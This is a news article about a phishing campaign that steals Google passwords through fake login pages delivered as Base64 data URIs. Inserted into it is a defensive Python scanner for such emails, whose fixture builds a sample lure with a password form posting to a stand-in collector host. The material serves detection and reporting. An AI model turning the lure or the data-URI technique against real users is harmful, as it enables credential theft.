Thousands affected as phishers steal Google passwords

Hackers are stealing Google account passwords by using "enhanced" phishing attacks, according to security researchers.


Anti-virus vendor Bitdefender detailed the scheme in a blog post on Monday, and said that hackers are relying on “new and better crafted” phishing attacks, which primarily affect users of the Google Chrome and Mozilla Firefox internet browsers, to compromise Google account holders.

“With access to users' Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,” said Catalin Cosoi, chief security strategist, in a statement. “The scam starts with an email allegedly sent by Google, with ‘Mail Notice’ or ‘New Lockout Notice’ as a subject.”

These emails warn the user that their account will be “locked in 24 hours” because it has reached its full email capacity. The user is therefore urged to click the “INSTANT INCREASE” link, which redirects them to a page masquerading as Google's official log-in page. The credentials entered there are then gathered by the hackers within the browser.

Cosoi notes that what is particularly interesting about the attack is that it is difficult for traditional heuristic detection, and for users, to notice, because the bogus webpage is delivered as a data uniform resource identifier (URI) rather than from a web address that Google Chrome could flag.

Bitdefender says the scammers avoid detection by using the data URI scheme, which embeds data in-line in a web page as if it were an external resource. The content of the fake webpage is encoded into the data URI string itself, with Base64 used to represent the file contents.

The browser eventually decodes it, but by that point it is too late.
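A defender-side check for the technique described above, added here as an example and not code from Bitdefender or the article: it finds data: URIs in an email body, decodes Base64 payloads (tolerating missing padding), and reports any decoded HTML that contains a password field together with where the form posts. The sample message and the collector.invalid form target are constructed for the example, not taken from the campaign.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# A data: URI in an href: optional media type/charset, optional ;base64 flag, then the payload.
DATA_URI_RE = re.compile(r"data:(?P<mime>[\w.+-]+/[\w.+-]+)?(?:;charset=[\w-]+)?(?P<b64>;base64)?,"
                         r"(?P<payload>[^\s\"'<>]+)", re.IGNORECASE)

class CredentialFormScanner(HTMLParser):
    # Counts password fields and records where each <form> posts its contents.
    def __init__(self):
        super().__init__()
        self.password_inputs, self.form_actions = 0, []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1

def decode_data_uri(match):
    """Decoded payload bytes; tolerates embedded whitespace and missing '=' padding."""
    payload = unquote(match.group("payload"))
    if not match.group("b64"):
        return payload.encode()  # non-base64 form is plain percent-encoded text
    payload = re.sub(r"\s+", "", payload)
    return base64.b64decode(payload + "=" * (-len(payload) % 4))

def find_inline_login_pages(message_html):
    """One finding per data: URI in the message body that decodes to a password form."""
    findings = []
    for m in DATA_URI_RE.finditer(message_html):
        if not (m.group("mime") or "text/plain").lower().startswith("text/html"):
            continue  # inlined images and fonts are ordinary mail content
        try:
            body = decode_data_uri(m)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        scanner = CredentialFormScanner()
        scanner.feed(body.decode("utf-8", errors="replace"))
        if scanner.password_inputs:
            findings.append({"bytes": len(body), "password_inputs": scanner.password_inputs,
                             "form_actions": scanner.form_actions})
    return findings

# Constructed fixture (not a campaign sample): a minimal password form behind the link.
FAKE_PAGE = (b'<form action="http://collector.invalid/post"><input name="Email">'
             b'<input type="password" name="Passwd"></form>')
SAMPLE_EMAIL = ('<p>Your account will be locked in 24 hours.</p><a href="data:text/html;base64,'
                + base64.b64encode(FAKE_PAGE).decode() + '">INSTANT INCREASE</a>')
```

Running `find_inline_login_pages(SAMPLE_EMAIL)` returns one finding whose `form_actions` entry is the address the stolen credentials would be posted to, which is the value a mail filter or incident responder would want to block or hunt for.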

So how many Google users have been affected by this phishing campaign? “So far, more than a thousand users clicked on a single shortened URL used in the cyber-campaign. The numbers are without doubt a lot higher, as scammers create more than a single URL when crafting a phishing wave,” Cosoi told SCMagazineUK.com.

He added that phishing attacks are becoming the new norm, a view which chimes with Kaspersky Lab's most recent report, which found that a third of phishing attacks are designed to hijack personal details which can then be used to steal money.

“Phishing used to be the ugly duckling of the e-threat landscape. According to our research, even social media users are becoming more aware of phishing than before,” he said.

“This is one of the reasons why cyber-criminals are trying to make phishing attacks harder to detect by both victims and antivirus software. They try to better imitate the authentic websites of the targeted institutions and they also try to optimise their email targeting. In the recent Orange France cyber-attack, they first breached its technical platform to gain access to a vast amount of sensitive data and eventually started to target victims via email. In Google's case, cyber-crooks seem to be using a database loaded with Google accounts.”

It is, however, hard for Google and other email providers to rectify, he says.

“Google and other email providers are trying to cope with such security issues, but as soon as they ban a spam sample or block a phishing attack – new ones are created. Cyber-criminals are active workers and continue to find new methods of bypassing email providers to gain access to more data that they may eventually transform into money. Stopping this kind of attack is mostly done by integrating anti-spam and anti-phishing technologies, but email providers have a hard time blocking every dangerous e-mail, as this is not their main job.”

Responding to the news, PhishMe VP Scott Greaux told SCMagazineUK.com that training on phishing and spear phishing is the answer here, something backed up by recent research which revealed that only 20 percent of UK office workers knew what phishing was.

“As with most phishing emails, this attack is targeting humans and relies on emotional bait to get the user to react,” Greaux said.

“Addressing risky email consumer behaviour is the only way to address this type of attack and traditional awareness methods continue to fail with both consumer and organisational email users. Immersing consumers in benign spear-phishing experiences allows them to learn at a deeper cognitive level and changes behavior making it easier to identify, avoid and report suspicious emails.”

He added: “Organisations who adopt this method of training are able to reduce their human attack surface and reduce incident response costs, all while adding a new source to their threat intelligence ecosystem.”